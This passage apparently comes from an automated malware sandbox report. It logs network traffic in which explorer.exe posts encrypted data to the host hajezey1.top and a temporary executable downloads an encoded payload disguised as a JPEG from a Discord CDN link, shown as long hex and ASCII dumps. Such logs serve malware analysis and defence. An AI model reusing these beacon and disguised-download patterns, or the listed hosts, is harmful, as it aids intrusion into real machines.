                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  9192.168.2.749757185.98.87.15980C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 29, 2021 20:29:24.308689117 CEST1425OUTPOST / HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://ivcdxqts.com/
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Length: 214
                                                  Host: hajezey1.top
                                                  Oct 29, 2021 20:29:24.385056973 CEST1425INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.20.1
                                                  Date: Fri, 29 Oct 2021 18:29:24 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 2cI:82OI:@_MqBJK,0


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.749773162.159.135.233443C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2021-10-29 18:29:49 UTC0OUTGET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2021-10-29 18:29:49 UTC0INHTTP/1.1 200 OK
                                                  Date: Fri, 29 Oct 2021 18:29:49 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 1023400
                                                  Connection: close
                                                  CF-Ray: 6a5e78bacf3f5ca4-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 32549
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "4c1a9946a2a50a9bee099f80736b83cb"
                                                  Expires: Sat, 29 Oct 2022 18:29:49 GMT
                                                  Last-Modified: Fri, 29 Oct 2021 09:26:31 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1635499591138366
                                                  x-goog-hash: crc32c=ewuz5A==
                                                  x-goog-hash: md5=TBqZRqKlCpvuCZ+Ac2uDyw==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 1023400
                                                  X-GUploader-UploadID: ADPycdvJxlr9khbKEXfSQ9n_bxglLL7dSGVIxF6rk63UtNA6boJtNKCUIT3dV9e0Gr4n6Y4UdNwOh6zGJyRPl1vLRno
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=14m12h6yWEg%2FfDNMkW4TmUKid3G1J7lBVW2CQqIir59j38YgcLGMh5UpHGhTd0Dk7fP%2FlSUsTZyv6q9URA4WevuuqiqaFZXFRtOiywdgHEp%2BHpQVAFhAxvQx6fq71A0DJyaedQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  2021-10-29 18:29:49 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                  2021-10-29 18:29:49 UTC1INData Raw: 4f 71 4a 70 6d 57 44 45 58 4d 2d 45 45 20 4d 4f 20 71 6d 6d 20 4f 20 70 20 4f 20 4f 20 4f 20 6d 20 4f 20 4f 20 4f 20 4a 57 57 20 4a 57 57 20 4f 20 4f 20 71 58 6d 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 44 6d 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 71 4a 58 20 4f 20 4f 20 4f 20 71 6d 20 70 71 20 71 58 44 20 71 6d 20 4f 20 71 58 4f 20 4d 20 4a 4f 57 20 70 70 20 71 58 6d 20 71 20 45 44 20 4a 4f 57 20 70 70 20 58 6d 20 71 4f 6d 20 71 4f 57 20 71 71 57 20 70 4a 20 71 71 4a 20 71 71 6d 20 71 71 71 20 71 4f 70 20 71 71 6d 20 4d 45 20 71 4f 4d 20 70 4a 20 4d 4d 20 4d 45 20 71 71 4f 20 71
                                                  Data Ascii: OqJpmWDEXM-EE MO qmm O p O O O m O O O JWW JWW O O qXm O O O O O O O Dm O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O qJX O O O qm pq qXD qm O qXO M JOW pp qXm q ED JOW pp Xm qOm qOW qqW pJ qqJ qqm qqq qOp qqm ME qOM pJ MM ME qqO q
                                                  2021-10-29 18:29:49 UTC2INData Raw: 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4a 57 20 6d 4f 20 4a 4a 4d 20 71 4f 4d 20 71 71 57 20 57 4f 20 6d 58 20 57 4f 20 57 4f 20 58 6d 20 71 71 6d 20 71 71 45 20 71 6d 44 20 71 6d 70 20 57 4f 20 6d 58 20 71 70 58 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 71 4a 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57
                                                  Data Ascii: O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O JW mO JJM qOM qqW WO mX WO WO Xm qqm qqE qmD qmp WO mX qpX Wm Xm qqm qqE qOM qqJ WO qqJ WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO W
                                                  2021-10-29 18:29:49 UTC4INData Raw: 71 71 4a 20 57 4f 20 45 44 20 71 58 70 20 57 57 20 58 6d 20 71 71 6d 20 58 57 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 58 6d 20 57 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 20 57 6d 20 58 6d 20 71 58 20 4d 71 20 70 71 20 70 20 44 6d 20 58 70 20 57 4f 20 57 6d 20 58 6d 20 71 45 58 20 71 71 58 20 71 4f 4d 20 71 71 4a 20 57 4f 20 4a 6d 4f 20 57 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 4d 4f 20 6d 4d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 57 70 20 71 4f 4d 20 71 71 4a 20 71 71 6d 20 70 4f
                                                  Data Ascii: qqJ WO ED qXp WW Xm qqm XW qOM qqJ WO qXm Wq Wm Xm qqX qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX qX Wm Xm qX Mq pq p Dm Xp WO Wm Xm qEX qqX qOM qqJ WO JmO Wq Wm Xm qqX qqE qOM qqJ qMO mM WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm Wp qOM qqJ qqm pO
                                                  2021-10-29 18:29:49 UTC5INData Raw: 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57
                                                  Data Ascii: mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO W
                                                  2021-10-29 18:29:49 UTC6INData Raw: 20 70 4d 20 70 45 20 6d 45 20 4a 71 45 20 6d 4a 20 71 71 45 20 71 4f 4d 20 71 71 70 20 4a 70 20 70 58 20 44 6d 20 57 57 20 58 6d 20 71 71 6d 20 57 20 70 71 20 6d 71 20 57 4f 20 6d 58 20 44 44 20 45 4a 20 45 6d 20 71 71 6d 20 71 71 45 20 71 4f 70 20 58 58 20 6d 57 20 6d 58 20 57 4f 20 44 4f 20 4a 6d 44 20 58 45 20 4d 58 20 70 71 20 71 20 57 4f 20 6d 58 20 44 44 20 44 58 20 4a 57 71 20 71 71 6d 20 71 71 45 20 4a 4d 20 71 6d 20 6d 6d 20 6d 58 20 57 4f 20 44 4f 20 71 4a 6d 20 71 4f 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 71 6d 6d 20 4a 71 20 6d 4a 20 44 58 20 71 6d 45 20 71 71 6d 20 71 71 45 20 4a 4d 20 4a 20 57 70 20 6d 4d 20 57 4f 20 45 4f 20 6d 4a 20 71 4f 58 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 6d 45 20 57 4f 20 57 6d 20 4d 6d 20 4a 4f 58 20
                                                  Data Ascii: pM pE mE JqE mJ qqE qOM qqp Jp pX Dm WW Xm qqm W pq mq WO mX DD EJ Em qqm qqE qOp XX mW mX WO DO JmD XE MX pq q WO mX DD DX JWq qqm qqE JM qm mm mX WO DO qJm qOM qqE qOM qJJ qmm Jq mJ DX qmE qqm qqE JM J Wp mM WO EO mJ qOX qqE qOM qJJ JD mE WO Wm Mm JOX
                                                  2021-10-29 18:29:49 UTC8INData Raw: 71 71 6d 20 71 71 70 20 44 4d 20 71 71 6d 20 57 4f 20 6d 58 20 4a 57 20 58 4d 20 71 71 4a 20 71 71 57 20 71 71 45 20 71 4f 45 20 4d 45 20 57 57 20 70 70 20 57 6d 20 4a 4f 4f 20 58 4a 20 71 44 6d 20 71 71 44 20 71 4f 4d 20 71 71 58 20 44 57 20 70 4f 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 20 71 70 4d 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 71 20 70 71 20 70 70 20 71 71 6d 20 71 4a 20 71 6d 4a 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 4f 44 20 57 4a 20 4a 70 57 20 58 57 20 71 71 6d 20 71 71 57 20 70 4f 20 4d 57 20 57 4f 20 6d 58 20 57 44 20 71 4d 20 4a 71 4a 20 71 6d 4f 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 44 20 57 71 20 57 4f 20 57 6d 20 71 4a 45 20 4a 4d 20 4d 57 20 71 4f 58 20 71 71 4a 20 57 4a 20 70 70 20 57 57 20 70 4d 20 58 4f 20 71 6d 4f 20 71 71 57 20
                                                  Data Ascii: qqm qqp DM qqm WO mX JW XM qqJ qqW qqE qOE ME WW pp Wm JOO XJ qDm qqD qOM qqX DW pO WO Wm Mm qJ qpM qOM qqJ Wm Jq pq pp qqm qJ qmJ qOM qqJ Wm JOD WJ JpW XW qqm qqW pO MW WO mX WD qM JqJ qmO qqE qOM qqD JD Wq WO Wm qJE JM MW qOX qqJ WJ pp WW pM XO qmO qqW
                                                  2021-10-29 18:29:49 UTC9INData Raw: 57 20 58 20 57 4f 20 57 6d 20 4d 6d 20 4d 4f 20 45 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 4d 20 57 70 20 70 4f 20 71 71 4f 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 70 20 57 70 20 57 6d 20 44 70 20 4a 70 57 20 71 4a 45 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 4a 44 20 57 44 20 57 4f 20 57 6d 20 58 4a 20 71 4a 44 20 71 71 6d 20 70 4f 20 4a 71 4d 20 57 4f 20 6d 58 20 57 4a 20 70 45 20 58 4f 20 4d 4d 20 71 71 70 20 71 71 70 20 4a 57 70 20 71 4f 6d 20 6d 58 20 57 4f 20 57 57 20 71 71 70 20 71 44 4a 20 4a 4a 4a 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 6d 20 57 20 57 6d 20 58 6d 20 71 4a 4f 20 44 20 58 57 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 70 57 20 58 6d 20 71 71 6d 20 71 71 57 20 45 57 20 71 4f 4a 20 70 70 20 57 70 20 71 4f 20 4a 70 6d 20
                                                  Data Ascii: W X WO Wm Mm MO ED qOM qqJ WD WM Wp pO qqO qqm qqE qOp Mp Wp Wm Dp JpW qJE qqW qqE qOM qqm JD WD WO Wm XJ qJD qqm pO JqM WO mX WJ pE XO MM qqp qqp JWp qOm mX WO WW qqp qDJ JJJ qOM qqJ Wm Jm W Wm Xm qJO D XW qqJ WO WX Mp qpW Xm qqm qqW EW qOJ pp Wp qO Jpm
                                                  2021-10-29 18:29:49 UTC10INData Raw: 20 57 6d 20 58 6d 20 71 71 6d 20 70 58 20 71 4f 58 20 71 71 4a 20 57 4f 20 71 4f 57 20 57 71 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 44 71 20 6d 58 20 57 4f 20 57 57 20 45 4d 20 44 44 20 71 71 57 20 71 4f 4d 20 57 4a 20 6d 58 20 6d 58 20 57 4f 20 57 70 20 58 6d 20 71 71 6d 20 71 4f 4f 20 70 4f 20 45 4d 20 57 4f 20 6d 58 20 57 44 20 44 4f 20 58 44 20 71 71 71 20 4a 6d 58 20 57 57 20 71 71 4a 20 57 4f 20 6d 4d 20 4a 70 20 4a 70 4f 20 71 6d 4f 20 71 71 6d 20 71 71 45 20 71 4f 57 20 58 58 20 57 20 6d 58 20 57 4f 20 44 4f 20 70 4d 20 45 6d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 4d 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 71 20 71 71 6d 20 44 4d 20 45 6d 20 57 4f 20 6d 58 20 57 44 20 4a 45 20 58 70 20 71 71 44 20 71 4a 4f 20 71
                                                  Data Ascii: Wm Xm qqm pX qOX qqJ WO qOW Wq Wm Xm qqp qqE qOM qqJ Dq mX WO WW EM DD qqW qOM WJ mX mX WO Wp Xm qqm qOO pO EM WO mX WD DO XD qqq JmX WW qqJ WO mM Jp JpO qmO qqm qqE qOW XX W mX WO DO pM Em qqE qOM qJJ JD M WO Wm Mm qJq qqm DM Em WO mX WD JE Xp qqD qJO q
                                                  2021-10-29 18:29:49 UTC12INData Raw: 45 20 71 4f 58 20 58 57 20 4a 4a 44 20 4a 71 6d 20 57 4f 20 57 6d 20 58 4f 20 4d 4f 20 44 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 71 4d 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 71 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 4a 20 45 4a 20 57 71 20 6d 58 20 57 4a 20 70 4d 20 58 70 20 4d 4d 20 71 71 70 20 71 4a 6d 20 71 71 45 20 6d 57 20 44 70 20 71 4d 71 20 71 4f 58 20 58 6d 20 71 71 6d 20 71 71 44 20 45 4a 20 71 44 4f 20 71 57 57 20 6d 58 20 57 4f 20 57 4f 20 71 4a 6d 20 44 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 44 57 20 58 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 4a 71 45 20 71 4f 4d 20 71 71 4a 20 57 4a 20 57 44 20 4a 44 20 6d 58 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 20 45 6d 20 57 71 20 6d 58 20
                                                  Data Ascii: E qOX XW JJD Jqm WO Wm XO MO DD qOM qqJ WD DE qO Wm Xm qJO JD qMp qqJ WO Wm Mp qp Xm qqm qJE J EJ Wq mX WJ pM Xp MM qqp qJm qqE mW Dp qMq qOX Xm qqm qqD EJ qDO qWW mX WO WO qJm DM qqE qOM qJJ DW X WO Wm Mm JM JqE qOM qqJ WJ WD JD mX Xm qqm qqW J Em Wq mX
                                                  2021-10-29 18:29:49 UTC13INData Raw: 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 4a 4a 44 20 71 70 4a 20 57 4f 20 57 6d 20 58 4f 20 4d 4f 20 44 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 71 4d 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 71 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4a 44 20 71 71 4d 20 70 57 20 57 57 20 6d 70 20 71 58 45 20 71 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 4a 4a 44 20 71 57 4d 20 57 4f 20 57 6d 20 58 4f 20 4d 4f 20 44 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 6d 57 20 71 71 4a 20 57 4f 20 57 58 20 70 71 20 6d 71 20 44 4d 20 71 71 45 20 71 4f 58 20 4a 4a 6d 20 6d 4a 20 57 4f 20 6d 58 20 57 71 20 71 4d 20 71 70 4a 20 71 6d 6d 20 71 71 45 20 71
                                                  Data Ascii: m qqm qqE qOX XW JJD qpJ WO Wm XO MO DD qOM qqJ WD DE qO Wm Xm qJO JD qMp qqJ WO Wm Mp qp Xm qqm qJE qJD qqM pW WW mp qXE qm qqm qqE qOX XW JJD qWM WO Wm XO MO DD qOM qqJ WD DE qO Wm Xm qJO JD mW qqJ WO WX pq mq DM qqE qOX JJm mJ WO mX Wq qM qpJ qmm qqE q
                                                  2021-10-29 18:29:49 UTC14INData Raw: 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 4f 4f 20 70 70 20 57 6d 20 70 57 20 57 4f 20 44 4d 20 71 71 4d 20 71 4f 44 20 71 4a 4f 20 4a 57 70 20 71 4f 6d 20 6d 58 20 57 4f 20 57 57 20 71 71 70 20 71 44 4a 20 71 57 45 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 6d 20 57 20 57 6d 20 58 6d 20 71 4a 4f 20 44 20 58 57 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 57 6d 20 58 6d 20 71 71 6d 20 71 71 57 20 71 4f 71 20 58 58 20 57 4a 20 6d 58 20 57 4f 20 6d 58 20 70 58 20 71 20 71 71 4d 20 71 4f 4d 20 4f 20 45 44 20 6d 44 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 71 4f 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 70 57 20 57 70 20 44 4d 20 71 44 20 71 71 57 20 71 71 45 20 71 4f 45 20 4d 4d 20 57 58 20 70 70 20 57 58 20 70 4d 20 58 4f 20 4d 4d 20 71 71 4a 20 71 71 6d 20 71 4a 6d
                                                  Data Ascii: qqW qqE qOM qOO pp Wm pW WO DM qqM qOD qJO JWp qOm mX WO WW qqp qDJ qWE qOM qqJ Wm Jm W Wm Xm qJO D XW qqJ WO WX Mp qWm Xm qqm qqW qOq XX WJ mX WO mX pX q qqM qOM O ED mD WO Wm Mm JM qOD qOM qqJ WD pW Wp DM qD qqW qqE qOE MM WX pp WX pM XO MM qqJ qqm qJm
                                                  2021-10-29 18:29:49 UTC16INData Raw: 6d 20 71 4a 45 20 71 71 6d 20 44 20 71 20 6d 4a 20 6d 58 20 70 70 20 57 4d 20 58 57 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 6d 57 20 71 20 71 20 57 45 20 58 45 20 4d 4f 20 44 4a 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 4f 20 4a 44 20 6d 4f 20 58 6d 20 71 71 6d 20 71 71 57 20 71 4f 70 20 4d 71 20 44 4f 20 57 4f 20 70 44 20 70 6d 20 71 4a 6d 20 58 6d 20 71 71 45 20 71 4f 4d 20 71 71 58 20 4d 70 20 71 71 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 4f 20 71 45 71 20 71 71 4f 20 58 44 20 4a 70 44 20 6d 58 20 57 4a 20 4a 58 20 58 57 20 4d 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57 6d 20 57 4f 20 70 20 71 71 71 20 71 71 6d 20 71 71 58 20 4d 58 20 71 71 4a 20 57 4f 20 6d 4d 20 70 70 20 44 20 58 44 20 71 71 6d 20 58 4a 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57 57 20
                                                  Data Ascii: m qJE qqm D q mJ mX pp WM XW qqE qOM qJJ mW q q WE XE MO DJ qOM qqJ WD WO JD mO Xm qqm qqW qOp Mq DO WO pD pm qJm Xm qqE qOM qqX Mp qq WO Wm Mm qJO qEq qqO XD JpD mX WJ JX XW MX qqE qOM qqJ WO Wm WO p qqq qqm qqX MX qqJ WO mM pp D XD qqm XJ qOM qqJ WO WW
                                                  2021-10-29 18:29:49 UTC17INData Raw: 20 71 71 4a 20 57 4f 20 4a 45 20 4d 70 20 4a 6d 58 20 58 57 20 71 71 6d 20 71 71 57 20 4a 20 71 44 71 20 57 71 20 6d 58 20 57 4a 20 44 4f 20 71 70 58 20 71 71 70 20 58 70 20 71 45 4d 20 71 71 4a 20 4a 70 44 20 57 71 20 4a 4f 20 4a 70 4a 20 58 6d 20 71 71 44 20 4d 57 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 71 70 20 44 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 45 20 6d 4d 20 57 4f 20 57 6d 20 45 44 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 58 70 20 57 71 20 6d 58 20 57 4f 20 57 70 20 58 6d 20 71 71 6d 20 71 71 45 20 4d 58 20 71 71 4a 20 57 4f 20 6d 4d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4a 71 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 6d 20 57 71 20 57 6d 20 58 6d 20 4d 4f 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 6d 4d 20 6d 58
                                                  Data Ascii: qqJ WO JE Mp JmX XW qqm qqW J qDq Wq mX WJ DO qpX qqp Xp qEM qqJ JpD Wq JO JpJ Xm qqD MW qOM qqJ WO qqp D Wm Xm qqm qqE qOM qqJ WE mM WO Wm ED qqm qqE qOM Xp Wq mX WO Wp Xm qqm qqE MX qqJ WO mM WO Wm Xm qqm qJq qOM qqJ WO mm Wq Wm Xm MO qqD qOM qqJ mM mX
                                                  2021-10-29 18:29:49 UTC18INData Raw: 4f 20 71 71 6d 20 4d 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 4a 20 71 71 6d 20 4a 6d 4d 20 4a 57 57 20 71 71 4a 20 6d 4d 20 57 58 20 57 4f 20 57 6d 20 58 57 20 71 4f 57 20 44 4d 20 71 4f 57 20 71 71 4a 20 71 71 6d 20 6d 4d 20 57 4f 20 57 6d 20 4d 57 20 71 71 6d 20 71 71 45 20 71 4a 6d 20 70 20 71 4a 71 20 6d 4d 20 57 4f 20 6d 58 20 4d 6d 20 71 71 4a 20 4a 44 20 57 4a 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 4f 4d 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 4a 20 45 4a 20 71 6d 57 20 6d 58 20 57 4f 20 57 6d 20 58 70 20 4a 4d 20 71 4a 4a 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 58 20 70 45 20 57 6d 20 58 6d 20 71 71 57 20 71 4a 71 20 71 4f 71 20 70 71 20 71 71 4f 20 6d 58 20 57 4f 20 44 4f 20 70 58 20 4a 6d 45 20 71 71 4d 20 71
                                                  Data Ascii: O qqm ME qOM qqJ WO mX WO Wm XJ qqm JmM JWW qqJ mM WX WO Wm XW qOW DM qOW qqJ qqm mM WO Wm MW qqm qqE qJm p qJq mM WO mX Mm qqJ JD WJ qqJ WO WX Mp qOM Xm qqm qJE qOJ EJ qmW mX WO Wm Xp JM qJJ qOM qqJ WD DX pE Wm Xm qqW qJq qOq pq qqO mX WO DO pX JmE qqM q
